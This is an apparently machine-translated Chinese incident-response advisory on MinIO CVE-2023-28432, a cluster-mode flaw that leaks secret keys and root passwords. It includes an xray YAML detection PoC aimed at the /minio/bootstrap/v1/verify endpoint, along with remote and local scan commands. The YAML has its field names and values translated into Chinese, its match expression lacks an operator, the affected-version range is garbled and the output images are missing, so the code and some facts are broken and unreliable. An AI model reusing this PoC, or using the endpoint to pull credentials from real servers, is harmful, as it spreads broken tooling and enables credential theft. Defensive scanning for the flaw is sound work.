【应急排查】MinIO 敏感信息泄露漏洞（CVE-2023-28432）

## 漏洞介绍\r

\r

### 事件源\r

\r

MinIO提供了高性能、兼容S3的对象存储系统，允许用户构建自己的云存储服务。 MinIO 原生支持Kubernetes，并且可在每个独立的公共云、每个Kubernetes 发行版、私有云和边缘的对象存储套件上使用。 \r

\r

3月20日，MinIO官方发布安全补丁，修复敏感信息泄露漏洞CVE-2023-28432：[https://github.com/minio/minio/security/advisor ies/GHSA-6xvq-wj2x-3h3q](https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q)\r

\r

### 漏洞描述\r

\r

在集群模式配置中，部分MinIO接口由于信息处理不当，返回了所有环境变量信息（包括MINIO\\_SECRET\\_KEY和MINIO\\_ROOT\\_PASSWORD），导致敏感信息泄露漏洞。攻击者可以通过获取的关键配置信息直接登录操作MinIO接口。 \r

\r

只有在集群模式下配置的MinIO 才会受到此漏洞的影响。利用此漏洞不需要用户身份验证。官方建议所有使用集群模式的用户尽快进行配置升级。 \r

\r

### 受影响的版本\r

\r

MinIORELEASE.2019-12-17T23-16-33Z=MinIOVersionMinIORELEASE.2023-03-20T20-16-18Z\r

\r

### 解决方案\r

\r

MinIO官方已发布相应补丁修复该漏洞。用户可以通过升级至RELEASE.2023-03-20T20-16-18Z版本来修复该漏洞。 \r

\r

### 产品支持\r

\r

云图：默认支持本产品的指纹识别，也支持该漏洞的PoC原理检测。 \r

\r

Insight：支持自定义POC形式的检测。 \r

\r

雷驰：已经发布了自定义规则来支持该漏洞的利用检测。 \r

\r

牧云（主机安全）：默认支持该产品的资产采集，同时也支持该漏洞的检测。 \r

\r

牧云（容器安全）：默认支持该产品的资产采集，同时也支持该漏洞的检测。 \r

\r

完整信息：已发布更新包以支持检测此漏洞的利用情况。 \r

\r

## 漏洞排查计划\r

\r

长亭科技为安全社区提供多种免费的社区安全工具。详情请查看【长汀科技安全社区CTStack】(https://stack.chaitin.com/)\r

\r

此漏洞可被利用\r

\r

* 基于长汀洞远程评估系统的免费社区工具[XRay](https://stack.chaitin.com/tool/detail?id=1)\r

\r

* 基于长汀牧云主机/容器安全产品的细化的免费社区工具VeinMind\r

\r

\r

### 远程故障排除\r

\r

1. [下载最新版xray工具](https://stack.chaitin.com/tool/detail?id=1)。 \r

\r

2、新建文件，填写以下PoC内容，并命名：poc-yaml-minio-cve-2023-28432.yaml\r

\r

```yaml\r

name: poc-yaml-minio-cve-2023-28432\r

手册: true\r

Transport: http\r

规则:\r

poc01:\r

请求:\r

cache: true\r

method: POST\r

路径: /minio/bootstrap/v1/verify\r

headers:\r

Content-Type: 应用程序/x-www-form-urlencoded\r

follow_redirects: 假\r

expression: response.status==200 response.body.bcontains(b\'MinioEndpoints\')\r

poc02:\r

请求:\r

cache: true\r

method: POST\r

路径: /bootstrap/v1/verify\r

headers:\r

Content-Type: 应用程序/x-www-form-urlencoded\r

follow_redirects: 假\r

expression: response.status==200 response.body.bcontains(b\'MinioEndpoints\')\r

表达式: poc01() || poc02()\r

详情:\r

作者: 链\r

链接:\r

- https://docs.min.io/cn/\r

漏洞:\r

level: 高\r

````\r

\r

3. 如果要扫描单个目标，以Windows平台为例，执行以下命令：\r

\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com\r

\r

-p参数用于指定PoC文件的路径，-u参数用于指定扫描目标。 \r

\r

如果观察到以下输出，则表明存在漏洞：\r

\r

！

\r

\r

4、如果要批量扫描多个目标，以Windows平台为例：\r

\r

\r

新建target.txt，填写需要扫描的URL，以换行符分隔，如：\r

\r

http://1.example.com\r

http://2.example.com\r

\r

执行以下命令：\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -uf ./target.txt\r

\r

-uf参数用于指定扫描目标文件。输出与上面相同。 \r

\r

5、建议使用--json-output\\[文件名\\]或--html-output\\[文件名\\]参数将扫描结果保存在本地，方便查看和分析，例如：\r

\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com --html-输出result.html \r

\r

如果扫描结果存在漏洞，可以在指定位置生成报告，示例如下：\r

\r

\r

\r

6.详细的xray使用手册请参考[xray安全评估工具文档](https://docs.xray.cool/#/)\r

\r

\r

### 本地故障排除\r

\r

1.【下载MinIO专用漏洞扫描工具】(https://stack.chaitin.com/tool/detail?id=181)\r

\r

2.执行扫描命令\r

\r

\r

扫描本地镜像:\r

\r

./veinmind-minio 扫描图像\r

\r

扫描本地容器:\r

\r

./veinmind-minio 扫描容器\r

\r

3.如果看到如下结果，则说明存在漏洞\r

\r

\r

\r

\r

## 参考文献\r

\r

[https://mp.weixin.qq.com/s/JgskenAZ6Cpecoe2k2AEjQ](https://mp.weixin.qq.com/s/JgskenAZ6Cpecoe2k2AEjQ)\r

\r

[https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z](https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z)\r

\r

[https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q](https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q)